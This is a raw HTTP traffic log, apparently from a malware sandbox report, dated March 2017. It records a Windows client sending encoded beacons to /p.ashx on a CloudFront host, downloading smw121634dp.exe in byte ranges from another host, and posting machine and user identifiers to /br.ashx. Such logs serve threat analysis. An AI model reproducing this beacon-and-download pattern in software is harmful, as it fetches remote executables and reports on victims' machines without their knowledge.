GET /p.ashx?e=QgW8pN5r26bof2QYjF1uPwq//z5qhHoX0EzYvxMWJRokIQgzNWOGCn 5ot6 EvdWkYIKgNqWBwS9Kbi6m4oCRvcc ZMAWsaKd CV/tiwlgli8v7N56mSgbKWjlfhE4uZvYsjUyDjDPpQHbPfmjbRP4kEtwV0krU/zEwKmF3LBrNhJ1C2zC9NPmVzJiGxHpFRq/ mwRQciAPvbT dq0IdZd990QLzNFTAqiKuwJ2QNWAL/XWHChDxEUKABP6K/iqqggPnHli0tZCBSCbmHG3q6QlEj4/HBfPTcUDrej7Uo8w= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 6JHsJJEIQeYo0-U4dqKv6CYhch8_WMhUszeoGYkXgpLzvmwM9QdOtA==

....

GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRLWT0ooBBF1fVw12R6ofm/Y8iQvDAJnGKH8qnmCyK7v7JBTPp2F5gxC Mhrkq09y/amn0hKiMbceR3MOwIZ76JwmTqIjEwZJX8qZPamPhh78rf8SKYsXwuBxaqSxr2X7ENAlt3MuTiXc= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: BlAOFcxwbOiXn9xTHFZ1UzETNCtZcA3a9c34Qmz6j7wUpVvdqQUGeg==

....

GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopR5YFWQUANi8 KgQWEQh9QronZvqoB 8mW4yIycFcn/ g= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: HbrK3FyvFAcYm46fOi9tRs90Cqn9Eg9S-wuHmAEBaGAYkUkTGH1ZNw==

....

GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRvcTB46xWnxTTJVfgp7thqbPiCC4paVhd HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: gFG1ay4GmQ0_IlYntzciED7awRAsPn-4_J9A49SOEymDwjnkPpy1oA==

....

GET /p.ashx?e=xY8ohDYpM iNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmquIApimWCrqakE8SFHLIEPsGc6 n uqijtZ6R90h7cidQhE1rXBz99ttxfA3C6KKE5uvEmaSYLmhGU1IGevJVygthPlRO7ICGTcD5MbnMHcJ64LtTjETGDUCjBYGPK7rWfXeCi/0KZZptbQRhqH8Cssw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:57 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: p5ELyWwKmjomEc2poXe2ugCS9kADtTjf7A5aNO6KYijkZhmOQNlnkg==

....

GET /p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmquvcTB46xWnxTle2fwOdHS0Y4G r 3F6T7bkBEy9Iv l4= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:57 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: kH9M4ekPufriambI8C0A_aLFK1VYvCRfBp-wq3vJiPyl1FtCKAtS_A==

....

GET /p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqujsg/omkWbCTQlB3kfGAhd0M7 7p6G3XAOQeYuSCl878AKo0mRYbtZmTrdmoQBtHVvQShiKWZ9cFEj3apiqwElP87VSn8EQRfyltSMgrsTyl8aUSP2VoumlpLPC 4XcIm7cGFoGtp5ECS7IK1ett99MZ5kXJQtKy834mgW150Op0Y6r6EQu3En4ua1g4fVI4GJA9YFpnE8QO8567A9PF2tojJydmmwDtH8qBHSjX/hDYPr3Ugg3/8WtyvhlGeipNV537D3i/QmJNPHtdPmcrksKcwUL4uIo9bBcP67p/rswd0aUeoU PGdmwVVPh7TxXkBCDWG0W34WuMrG6DH6H0HA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:57 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 0S8KGBuGMkqPy9cBQgxTzAdiRAmoEFbFBGUTLOwoi8dlWjrJo4koLw==

....

GET /p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqubz0XqPn9zR0IiyFlsxNmPbPiCC4paVhdpvBRerX5l2CaTGmM9zHPWA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:58 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 2YXlRet6tnFPhmM98-RqzfUyCCRYZV4i7Xhs_vNWHDiRubY12AoB8Q==

....

GET /p.ashx?e=WL9usJOVMsPlWW0ay34fCUdUxmGl9EyeYDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB/nYE3DWujWaoU2sQ4uGCDUUAvnawhe3hbDffmPgH7pM6gKn8h0qT3aBcaoZob0e9Q== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:58 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: oTTUpjh13vBM9R7uL1lLXiaPfuN6_O8D5L81ndXQn8Dj5Aee-_I0EQ==

....

GET /p.ashx?e=043Mckb8Lnhw7iCtSAyu/ QhfXa/CCW5NPZS6pZIlAEr4Spdf2ZexL9An1YluClXsGG6qLQR8LceI9VTThLJ3UlF4mqrDXF/L3OhFAPbRTejORB6u31KNxKv6VolbFNDUxX212nyBDAafyyUl C9vORgvLZHT a72UC/bfWIAgSqinVSQQ1bE6yLXK7ul6nZPXUNd68JXUDrKwD6t b1ZfKiWnlKjT8nQI8HtM9wp5Tx0cXu7AB1uimF904v4t2DIApimWCrqakt3bH6c7GAHITnquSe8GwjLnPqEPf2/rl3s8pSKbhxWudjDabjiU15bfhBVTXmVIKy2EBoQQl304tsVuXqTBm48VmE3ZuCJs4y1aJnkp ScdBb0CbA7Wqcrbq8YHwKZS4RrSPwflTyFw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:58 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: FLVgKiMRIXIw65z1htvDBY1YfN1U0R9J56DzZNT16K0TYEc46BPLLg==

GET /smw121634dp.exe HTTP/1.1

Range: bytes=0-249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:01 GMT

Content-Range: bytes 0-249999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: B-NB4C4upWTh9sx666RTwKjdFQiz_aRLPfClxajzrzhk1p5aClqPpg==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=250000-499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:03 GMT

Content-Range: bytes 250000-499999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 8cGGfGwRI8B_IL6HDaIf33fRLi4ZrMwjjwHxMeiWT0NKu6xAGBAn_w==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=750000-999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:06 GMT

Content-Range: bytes 750000-999999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: xv60FsoCinZiXNy8Zd2f8DEi2-0SNRbuelKIwqOuswlbv7_QTYlp2w==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=1250000-1499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:06 GMT

Content-Range: bytes 1250000-1499999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 5qszbFpfEM6_n_SHqnSua2dClwcYhoalNqftFuUXQXLNifKQ_LQnmQ==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=1500000-1749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:06 GMT

Content-Range: bytes 1500000-1749999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: A1qcf8jMm6EfdnLBl4pfkuyLfq9M7Uqf5dGsKlmAbbga_l7uEdSQdw==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=1750000-1999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:07 GMT

Content-Range: bytes 1750000-1999999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: O60HVq8xryQtoELtUxkF8_4apIxdbPGzEchY3NXfaSwuRUB2_efYeQ==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=2250000-2499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:07 GMT

Content-Range: bytes 2250000-2499999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 61z2GHNcv2SJ3EZCGA9l_0zla_R829QyYR1XaPZy4XAvFw6c-lfzJA==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=2750000-2999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:08 GMT

Content-Range: bytes 2750000-2999999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: PbnrUwqUApr6PQSXhWpG9mCaD8OZ9r3J7nW8I5ZDgeRhArGZtOc_dQ==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=3250000-3359007

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 109008

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:09 GMT

Content-Range: bytes 3250000-3359007/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: I31ccdgXE3qawaG5WkECGySddehcAOPF3r7sbp2_0ec9HAyJnKf0nA==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=500000-749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:03 GMT

Content-Range: bytes 500000-749999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 73bYzrGAQNmnG1baOMtjc5-dfLee3rDLMHTGLcQTJSulzOA0hZRqNA==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=1000000-1249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:06 GMT

Content-Range: bytes 1000000-1249999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)

X-Amz-Cf-Id: GOtOcUaeRubNkdJJcxbDp34Q7UvWRt24FjfdWQixZSboFzckdf8XyA==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=2000000-2249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:07 GMT

Content-Range: bytes 2000000-2249999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)

X-Amz-Cf-Id: In5ZPfnrz4RStEHUJKJFc_bd7MY7cv54AbD8JuHhDS8qw4BcFn41mQ==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=2500000-2749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:07 GMT

Content-Range: bytes 2500000-2749999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)

X-Amz-Cf-Id: UJBgyu-grWH9iJrDK9N1Fi5GMnW6lToTKqBVlqBOJkPDl2iaqxci9g==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=3000000-3249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:08 GMT

Content-Range: bytes 3000000-3249999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)

X-Amz-Cf-Id: HYkReG18M0uc9GlZ8mnOOUb0KoWlETc6mEBYP88wmo9j6kPC8AKe5Q==

<<< skipped >>>

GET /p.ashx?e=lOCrbsNL2zXY n Drgf83Ceu24nwBOho9kJpoiaoxYR6njPZcIS19LQZ0RbIZgn/G04r2GZQbxA4k4Gm5vvSsnGAt48jCvkuTKeC3EisBSuPQCW3Xc52o2/NJcbq0HoEgctTzNTrZipoENv9hv yb1U5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mri4btG OZIk/aFQl5nsf8/DcvKSgaF6RF7PiCC4paVhdYzx82mF 8 w= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:14 GMT

X-Cache: Miss from cloudfront

Via: 1.1 27b3a801292660302bc6c8d6a96c71ce.cloudfront.net (CloudFront)

X-Amz-Cf-Id: IqKgcCHBKYBnbQOW_sqLgoSHwKTPgWNQH-dElrevhRthrbjMuiZTUQ==

GET /p.ashx?e=lOCrbsNL2zXY n Drgf83Ceu24nwBOho9kJpoiaoxYTLUfe2AWI4iW/NJcbq0HoEgctTzNTrZipoENv9hv yb1U5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mri4btG OZIk/aFQl5nsf8/DcvKSgaF6RF7PiCC4paVhdKPgmwjXNu7I= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:14 GMT

X-Cache: Miss from cloudfront

Via: 1.1 d6fa2e1de8f392301c10fd5bb7b263c3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 5dGyfRyvNsaT36GyavkHw40BfuerDGzXL3efhPpd2OpD9RNXP77kuQ==

GET /p.ashx?e=bdqY0vC4PYtCQdt9doPgoA0rZFNspeHnFDDfVv/vH29/uaLevhL3VpGCCoDalgcEvSm4upuKAkb3HPmTAFrGinfglf7YsJYJYvL zeepkoH7lS9xrvVML BEf8zqYXvVBuc4HO5RaucB0eAPmqRh7cqZ27dtquSa6Yc5lgnLWj9NhpNg/N/OrsNgV0KIQ93 dulfay3 QHl32cx0G27ZSGAqR2XPWVGh9o0hxHg3iWEUAvnawhe3hRc0NdkJ4D18DFbcjOkM5Uo QFr7zZfYbQ== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:14 GMT

X-Cache: Miss from cloudfront

Via: 1.1 d6fa2e1de8f392301c10fd5bb7b263c3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: WIaVVq4FaajpOxw7kcMX8NRAQnzthqVVm6lg-bt7YByOUnE5sU4r-A==

POST /br.ashx?pid={PID}&aid={AID}&ss=0&s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507,&v=2.3.12.1634&md5=8fabe64f8ec5d8b0b835e8a83f29082c&mid=AiAAAiAAA3A9AAA7A3AJieA1A91J7L773DiLAiiAA13D1J&uid=6F75218C-FEA5-4C12-BC59-BB31CD1E1E1A HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)

Host: d23ocewf5ttxmu.cloudfront.net

Content-Length: 2086

Connection: Keep-Alive

Cache-Control: no-cache

